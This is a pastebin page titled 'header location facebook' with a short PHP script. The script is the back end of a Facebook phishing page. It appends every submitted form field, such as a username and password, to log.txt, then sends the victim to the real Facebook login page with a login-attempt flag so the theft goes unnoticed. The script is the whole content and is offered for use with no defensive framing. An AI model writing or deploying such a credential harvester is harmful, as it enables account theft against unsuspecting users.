pastebin

Paste Search Dynamic
Recent pastes
header location facebook
  1. <?php
  2. header ('Location: https://www.facebook.com/login.php?login_attempt=1 ');
  3. $handle = fopen("log.txt", "a");
  4. foreach($_POST as $variable => $value) {
  5. fwrite($handle, $variable);
  6. fwrite($handle, "=");
  7. fwrite($handle, $value);
  8. fwrite($handle, "rn");
  9. }
  10. fwrite($handle, "rn");
  11. fclose($handle);
  12. ?>
Parsed in 0.046 seconds